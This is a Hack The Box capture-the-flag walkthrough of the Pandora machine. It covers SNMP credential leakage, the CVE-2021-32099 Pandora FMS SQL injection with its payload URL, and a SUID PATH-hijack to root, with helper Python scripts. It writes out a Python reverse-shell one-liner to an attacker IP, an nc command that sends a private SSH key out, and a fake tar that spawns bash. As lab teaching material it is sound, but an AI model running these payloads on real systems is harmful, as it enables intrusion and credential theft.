
Pandora HTB Walkthrough

Machine Info

  • OS: Linux
  • Difficulty: Easy
  • Points: 20
  • Release: 08 Jan 2022
  • IP: 10.10.11.136

Network Scanning

We start with an nmap scan. A full TCP port scan shows only two open ports: SSH on 22 and HTTP on 80. We browse the website on port 80 for a while and find nothing interesting (the hostname panda.htb used for SSH below has to be mapped to 10.10.11.136 in /etc/hosts).

nmap -p- -A -T4 10.10.11.136


Since TCP gives us nothing, we try a UDP scan. It reports a bunch of open|filtered ports, but the one that matters is SNMP on 161/udp. The agent speaks SNMPv1, which has no real security: the only access control is a community string sent in cleartext, and the read-only string is very often left at the default "public" (which is what nmap's SNMP scripts try, and it works here).

nmap -sU -A -T4 10.10.11.136


Enumeration

Looking at the snmp-processes script output (the HOST-RESOURCES-MIB process table, which lists every running process together with its command-line arguments), we find a process that was started with a credential in its arguments: "daniel:HotelBabylon23". The same table can be read with snmpwalk against the host. Credentials passed in argv are visible to any local user through ps anyway; an open SNMP agent simply extends that exposure to the network.
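The step above, automated: the script below pairs the hrSWRunName, hrSWRunPath and hrSWRunParameters columns of the process table by PID and flags argument lists that look like they carry a password. It is an added example, not code from the walkthrough. The snmpwalk output it parses is constructed: the process name "check_script" and the other processes are hypothetical stand-ins, and only the daniel:HotelBabylon23 credential comes from the box.

```python
"""Pull credentials out of the SNMP process table that nmap's snmp-processes
script (and snmpwalk) expose.

Added example, not code from the walkthrough. SAMPLE_WALK is constructed:
"check_script" and the other processes are hypothetical; only the
daniel:HotelBabylon23 credential comes from the box.
"""
import re

# Constructed sample in the style of
#   snmpwalk -v1 -c public <host> HOST-RESOURCES-MIB::hrSWRun
# Each process appears once per column, keyed by its PID.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.842 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunName.1106 = STRING: "check_script"
HOST-RESOURCES-MIB::hrSWRunName.1200 = STRING: "apache2"
HOST-RESOURCES-MIB::hrSWRunPath.1 = STRING: "/sbin/init"
HOST-RESOURCES-MIB::hrSWRunPath.842 = STRING: "/usr/sbin/sshd"
HOST-RESOURCES-MIB::hrSWRunPath.1106 = STRING: "/usr/bin/check_script"
HOST-RESOURCES-MIB::hrSWRunPath.1200 = STRING: "/usr/sbin/apache2"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: ""
HOST-RESOURCES-MIB::hrSWRunParameters.842 = STRING: "-D"
HOST-RESOURCES-MIB::hrSWRunParameters.1106 = STRING: "-u daniel -p HotelBabylon23"
HOST-RESOURCES-MIB::hrSWRunParameters.1200 = STRING: "-k start"
"""

LINE_RE = re.compile(
    r'^HOST-RESOURCES-MIB::(hrSWRunName|hrSWRunPath|hrSWRunParameters)\.(\d+)'
    r' = STRING: "(.*)"$'
)
# Common ways a secret ends up in argv: -p <x>, --password <x> / --password=<x>,
# password=<x>, pwd=<x>. This is a heuristic, not an argv parser; extend to taste.
PASS_RE = re.compile(
    r'(?:(?:-p|--pass(?:word)?)[ =]+(\S+))|(?:\b(?:pass(?:word)?|pwd)=(\S+))', re.I
)
USER_RE = re.compile(r'(?:-u|--user(?:name)?)[ =]+(\S+)', re.I)


def parse_hr_swrun(text):
    """Group the three hrSWRun columns by PID: {pid: {column: value}}."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        column, pid, value = m.groups()
        procs.setdefault(int(pid), {})[column] = value
    return procs


def find_credentials(procs):
    """Return processes whose command-line arguments look like they carry a password."""
    hits = []
    for pid, proc in sorted(procs.items()):
        args = proc.get("hrSWRunParameters", "")
        m = PASS_RE.search(args)
        if not m:
            continue
        user = USER_RE.search(args)
        hits.append({
            "pid": pid,
            "name": proc.get("hrSWRunName", ""),
            "path": proc.get("hrSWRunPath", ""),
            "user": user.group(1) if user else None,
            "password": m.group(1) or m.group(2),
        })
    return hits


if __name__ == "__main__":
    for hit in find_credentials(parse_hr_swrun(SAMPLE_WALK)):
        print(f"pid {hit['pid']} {hit['path']}: user={hit['user']} password={hit['password']}")
```

Against a live target you would feed it the output of `snmpwalk -v1 -c public 10.10.11.136 HOST-RESOURCES-MIB::hrSWRun`. The parser expects the symbolic column names, which snmpwalk only prints when the HOST-RESOURCES-MIB is loaded; without MIBs the same columns appear as numeric OIDs under .1.3.6.1.2.1.25.4.2.1 (2 = name, 4 = path, 5 = parameters).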


Exploitation

We try that credential against SSH and it works.

ssh daniel@panda.htb


Checking /etc/passwd for other users with a login shell, we find "matt". The user flag is in matt's home directory, so we need to move from daniel to that user.


Privilege Escalation

User Matt

We run linpeas and find a second website, served only on the loopback interface on port 80, so it is not reachable from outside the box.


Therefore, we use SSH local port forwarding through daniel's session to reach that internal service from our own machine.

# binding local port 80 needs root on the attacking machine; a high port (-L 8080:127.0.0.1:80) works the same
ssh -L 80:127.0.0.1:80 daniel@panda.htb


Checking the website, it runs Pandora FMS v7.0NG.742. Logging in with "daniel:HotelBabylon23" does not work. This version is affected by CVE-2021-32099, an unauthenticated SQL injection in include/chart_generator.php: the session_id parameter is concatenated into the query that looks up the PHP session, so a UNION SELECT can return attacker-chosen serialized session data (id_usuario|s:5:"admin"; in PHP's session format) and the console treats the request as a logged-in admin. The blog CVE-2021-32099 explains the bug and CVE-2021-32099_Payload is the payload used to gain access; requesting the URL below in the browser gives us an admin session in the console.

http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO
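To see why the payload above works, here is the injection replayed against a miniature sessions table, with the vulnerable lookup beside its parameterized fix and the PHP session decoding the console performs on the returned row. This is an added example, not code from the walkthrough or from Pandora FMS: the tsessions_php table, its three columns and the query shape are a simplified, constructed stand-in for the real session lookup; the payload and the URL are the ones from the walkthrough.

```python
"""Why the CVE-2021-32099 payload logs you in as admin: a UNION-based injection
into the session lookup returns attacker-chosen serialized session data, and
the application trusts whatever comes back.

Added example, not code from the walkthrough or from Pandora FMS. The table,
its columns and the query shape are a constructed stand-in for the real
session lookup; only the payload and the URL come from the walkthrough.
"""
import re
import sqlite3
from urllib.parse import quote, urlencode

# Payload from the walkthrough, before URL encoding. It closes the string
# literal, UNIONs in a fake session row, and comments out the trailing quote.
PAYLOAD = "' union SELECT 1,2,'id_usuario|s:5:\"admin\";' as data -- SgGO"

CHART_URL = "http://127.0.0.1/pandora_console/include/chart_generator.php"


def make_db():
    """In-memory sessions table with one real, unprivileged session (constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE tsessions_php (id_session TEXT PRIMARY KEY, last_active INTEGER, data TEXT)"
    )
    db.execute(
        "INSERT INTO tsessions_php VALUES (?, ?, ?)",
        ("abc123", 1641600000, 'id_usuario|s:6:"daniel";'),
    )
    return db


def lookup_vulnerable(db, session_id):
    """The bug: the request parameter is concatenated straight into the SQL string."""
    sql = f"SELECT id_session, last_active, data FROM tsessions_php WHERE id_session = '{session_id}'"
    return db.execute(sql).fetchone()


def lookup_fixed(db, session_id):
    """The fix: a bound parameter, so the input can only ever be compared as a session id."""
    sql = "SELECT id_session, last_active, data FROM tsessions_php WHERE id_session = ?"
    return db.execute(sql, (session_id,)).fetchone()


def php_session_decode(data):
    """Decode the key|s:N:"value"; pairs of PHP's session serialization (string values only)."""
    out = {}
    for m in re.finditer(r'([^|;]+)\|s:(\d+):"(.*?)";', data):
        key, length, value = m.group(1), int(m.group(2)), m.group(3)
        if len(value) != length:
            raise ValueError(f"bad length for {key}")
        out[key] = value
    return out


def session_user(row):
    """What the application does next: read id_usuario out of the session data."""
    return php_session_decode(row[2]).get("id_usuario") if row else None


def exploit_url():
    """The walkthrough's GET request, URL-encoded (quote keeps %20 rather than +)."""
    return CHART_URL + "?" + urlencode({"session_id": PAYLOAD}, quote_via=quote)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup sees user:", session_user(lookup_vulnerable(db, PAYLOAD)))
    print("fixed lookup sees user:     ", session_user(lookup_fixed(db, PAYLOAD)))
    print(exploit_url())
```

The first SELECT matches no row (the session id is empty), so the only row the vulnerable query returns is the one the UNION supplies, and its third column decodes to id_usuario = admin. With the bound parameter the whole payload is just a session id that does not exist, and the lookup returns nothing.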


We then try to upload a web shell or backdoor through the console but cannot get it working. Searching instead, we find the script CVE-2021-32099 Pandora_v7.0NG.742 (sqlpwn.py), which automates the injection and gives an interactive shell on the box, running as matt. From it we spawn a reverse shell back to a listener on our machine, upgrade it to a fully interactive TTY, and read the user flag.

# run the exploit script against the forwarded console port
./sqlpwn.py -t 127.0.0.1
# on the attacking machine, listen for the callback
nc -nlvp 4444
# on the box, from the shell the script gives us: reverse shell to the attacker (10.10.16.13)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.13",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


Root

Running linpeas again as matt, we find a SUID binary called "pandora_backup". We copy it to our machine to investigate, and strings shows that it invokes tar by its bare name rather than an absolute path, so tar is resolved through PATH at run time. Because PATH is inherited from whoever runs the binary, we can create our own tar in a directory we control, prepend that directory to PATH, and the privileged binary will execute it.

strings pandora_backup
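The check above, automated so it can be run over every SUID binary on a box: the script below reimplements the strings extraction, flags strings that start with a known command given without a directory component, and then demonstrates which file a planted PATH entry makes that name resolve to. It is an added example, not code from the walkthrough. SAMPLE_BINARY is a constructed stand-in for pandora_backup: its strings are invented for the demonstration, and only the fact that tar is called by bare name matches the box.

```python
"""Find commands a binary runs by bare name (resolved through PATH), the check
behind the pandora_backup finding, and show which file a planted PATH entry
makes that name resolve to.

Added example, not code from the walkthrough. SAMPLE_BINARY is a constructed
stand-in for the real pandora_backup: the strings in it are invented for the
demonstration (only the fact that tar is called by bare name matches the box).
"""
import os
import re
import shutil
import stat
import tempfile

SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"/lib64/ld-linux-x86-64.so.2\x00"
    + b"PandoraFMS Backup Utility\x00"
    + b"Now attempting to backup the console\x00"
    + b"tar -czf /var/backups/pandora.tgz /var/www/pandora\x00"   # bare name: hijackable
    + b"/usr/bin/mysqldump --all-databases\x00"                   # absolute path: not
    + b"systemctl restart apache2\x00"                             # bare name: hijackable
    + b"Backup failed!\x00"
    + b"GLIBC_2.2.5\x00"
)

# Executables a privileged helper commonly shells out to.
KNOWN_COMMANDS = {"tar", "gzip", "zip", "cp", "mv", "rm", "cat", "find", "chmod",
                  "chown", "sh", "bash", "mysqldump", "systemctl", "service"}


def extract_strings(blob, min_len=4):
    """Equivalent of `strings`: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def find_relative_commands(strings, known=KNOWN_COMMANDS):
    """Strings that start with a known command given without a directory component."""
    hits = []
    for s in strings:
        tokens = s.split()
        first = tokens[0] if tokens else ""
        if first in known and "/" not in first:
            hits.append({"command": first, "string": s})
    return hits


def hijack_demo(command="tar"):
    """Plant a fake `command` in a fresh directory, prepend that directory to PATH,
    and report which file now resolves, as a PATH-based lookup in the SUID binary would."""
    planted_dir = tempfile.mkdtemp(prefix="hijack-")
    planted = os.path.join(planted_dir, command)
    with open(planted, "w") as fh:
        # -p keeps the effective uid if the binary only switched euid (see the note below)
        fh.write("#!/bin/bash\nexec /bin/bash -p\n")
    os.chmod(planted, os.stat(planted).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    path = planted_dir + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
    try:
        resolved = shutil.which(command, path=path)
    finally:
        shutil.rmtree(planted_dir, ignore_errors=True)
    return {"planted": planted, "resolved": resolved}


if __name__ == "__main__":
    for hit in find_relative_commands(extract_strings(SAMPLE_BINARY)):
        print(f"hijackable: {hit['string']!r}")
    print(hijack_demo())
```

A bare-name string is only a candidate: confirm that the binary really executes it (ltrace shows the system() or execvp() call with its argument) and that it does not sanitise PATH first. If the binary only changes its effective uid before calling tar, a plain bash drops that privilege at startup, which is why the planted script uses bash -p.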


We tried this from the shell obtained through the web exploit, without logging in over SSH as matt, and it did not work. A common reason for a SUID exploit failing from a shell spawned by a web server is that the service was started with no_new_privs set (systemd's NoNewPrivileges=true): the kernel then ignores setuid bits for every process descended from it, and `grep NoNewPrivs /proc/self/status` reports 1. Rather than investigate further, we generate an SSH key pair as matt, add the public key to matt's authorized_keys, and log in over SSH, which gives a clean session.

# On the victim machine, as matt: generate a key pair (accept the defaults)
ssh-keygen
cd /home/matt/.ssh
# authorise the new public key (this overwrites any existing authorized_keys)
cat id_rsa.pub > authorized_keys
chmod 600 authorized_keys
# ship the private key to the attacking machine
nc 10.10.16.13 9999 < id_rsa

# On the attacking machine: receive the key and log in with it
nc -nlvp 9999 > id_rsa
chmod 600 id_rsa
ssh matt@panda.htb -i id_rsa


Then we create our malicious tar, a script that simply runs bash, and prepend its directory to PATH. Running pandora_backup now executes our tar with root privileges and we get a root shell.

cd /tmp
# fake tar: when the SUID binary calls "tar", this runs instead
# (if the binary only switches its effective uid, bash drops it; use '/bin/bash -p' then)
echo '/bin/bash' > tar
chmod +x tar
# put /tmp first so it wins the PATH lookup
export PATH=/tmp:$PATH
# run the SUID binary (by its full path if it is not in the current directory)
./pandora_backup
id
cd /root
cat root.txt

root

This post is licensed under CC BY 4.0 by the author.